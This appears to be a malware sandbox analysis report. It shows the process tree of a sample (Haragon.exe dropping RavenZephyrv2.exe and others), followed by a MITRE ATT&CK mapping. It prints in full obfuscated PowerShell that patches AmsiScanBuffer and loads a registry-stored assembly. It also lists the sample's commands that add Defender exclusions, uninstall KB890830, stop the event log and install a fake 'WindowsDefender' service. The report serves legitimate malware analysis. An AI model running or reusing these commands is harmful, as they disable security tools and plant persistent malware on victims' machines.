C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1260
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:qJZoxfZHmLNB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LyxsijJCFnuDTj,[Parameter(Position=1)][Type]$UhNvAcKdKK)$GcyylXCcQrt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'emo'+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$GcyylXCcQrt.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+'g'+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LyxsijJCFnuDTj).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$GcyylXCcQrt.DefineMethod(''+[Char](73)+''+'n'+'vok'+[Char](101)+'',''+'P'+'u'+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'lo'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$UhNvAcKdKK,$LyxsijJCFnuDTj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+[Char](100)+'');Write-Output $GcyylXCcQrt.CreateType();}$CibhkYNmexfyh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+'t'+''+[Char](101)+'m.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+'n'+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+'at'+'i'+'v'+'e'+'Me'+[Char](116)+''+'h'+''+'o'+'d'+[Char](115)+'');$MfthwbBojWCRgn=$CibhkYNmexfyh.GetMethod('G'+'e'+'t'+[Char](80)+''+'r'+''+[Char](111)+''+'c'+'A'+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+'S'+''+'t'+'ati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TDDvGtqZEbGDIERGFCN=qJZoxfZHmLNB @([String])([IntPtr]);$mOKYWEotuhdOCaoZekFrtz=qJZoxfZHmLNB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zEPXLFoOqAd=$CibhkYNmexfyh.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$GOxqXEAeFavmMJ=$MfthwbBojWCRgn.Invoke($Null,@([Object]$zEPXLFoOqAd,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$tliasXmcCFkvjyZog=$MfthwbBojWCRgn.Invoke($Null,@([Object]$zEPXLFoOqAd,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+'l'+'P'+[Char](114)+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$eScMoQL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GOxqXEAeFavmMJ,$TDDvGtqZEbGDIERGFCN).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$pKFydHMxOOMPdjAXD=$MfthwbBojWCRgn.Invoke($Null,@([Object]$eScMoQL,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KFKuUXysZe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tliasXmcCFkvjyZog,$mOKYWEotuhdOCaoZekFrtz).Invoke($pKFydHMxOOMPdjAXD,[uint32]8,4,[ref]$KFKuUXysZe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pKFydHMxOOMPdjAXD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tliasXmcCFkvjyZog,$mOKYWEotuhdOCaoZekFrtz).Invoke($pKFydHMxOOMPdjAXD,[uint32]8,0x20,[ref]$KFKuUXysZe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:BtGNpArxMUGp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ulcXCNhliNVLnr,[Parameter(Position=1)][Type]$DLfMZVsbpr)$XboridhuMQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'P'+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+'Se'+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$XboridhuMQc.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'ec'+'i'+''+[Char](97)+'l'+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+','+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ulcXCNhliNVLnr).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$XboridhuMQc.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+'yS'+'i'+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+'t'+''+','+'Virt'+[Char](117)+'a'+[Char](108)+'',$DLfMZVsbpr,$ulcXCNhliNVLnr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'i'+'m'+''+'e'+',Mana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $XboridhuMQc.CreateType();}$kfdnnnjQNlLsA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'in'+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+[Char](102)+''+'e'+'Na'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$BtDrwrMvmKEypu=$kfdnnnjQNlLsA.GetMethod('G'+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'re'+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'lic'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JAeFebsbSVDxnpqIeck=BtGNpArxMUGp @([String])([IntPtr]);$gGYOfAgoBHOdtaACJKCMTe=BtGNpArxMUGp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CKtPekevvVU=$kfdnnnjQNlLsA.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+'l'+'l')));$nRhUUOzqAfQiih=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$CKtPekevvVU,[Object](''+'L'+'oad'+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+'A')));$nGtddwfgysPvFADcj=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$CKtPekevvVU,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$FRyFQWR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nRhUUOzqAfQiih,$JAeFebsbSVDxnpqIeck).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$QWDwIuvLCRVHsCImz=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$FRyFQWR,[Object](''+[Char](65)+'m'+[Char](115)+'i'+'S'+''+[Char](99)+'anB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$dpRZLqoKji=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nGtddwfgysPvFADcj,$gGYOfAgoBHOdtaACJKCMTe).Invoke($QWDwIuvLCRVHsCImz,[uint32]8,4,[ref]$dpRZLqoKji);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QWDwIuvLCRVHsCImz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nGtddwfgysPvFADcj,$gGYOfAgoBHOdtaACJKCMTe).Invoke($QWDwIuvLCRVHsCImz,[uint32]8,0x20,[ref]$dpRZLqoKji);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+[Char](97)+'le'+[Char](114)+'st'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3212
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1568
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2156

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2256

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2336

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2736

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2840

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3568

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3656
- C:\Users\Admin\AppData\Local\Temp\Haragon.exe
  "C:\Users\Admin\AppData\Local\Temp\Haragon.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe
    "C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe"
    3⤵
    - Executes dropped EXE
    PID:1712
- - C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe
    "C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1728
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1592
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2788
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4988
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2456
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:2928
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:220
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2252
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2872
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:820
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3772

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4132

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4356

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4172

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3080

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3984

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4372

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
1⤵
PID:4460

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4928

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:1912

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1596

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4424

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1168

C:\ProgramData\Defenderupdates.exe
C:\ProgramData\Defenderupdates.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:732
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4836
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3600
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4388
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3696

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:3580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

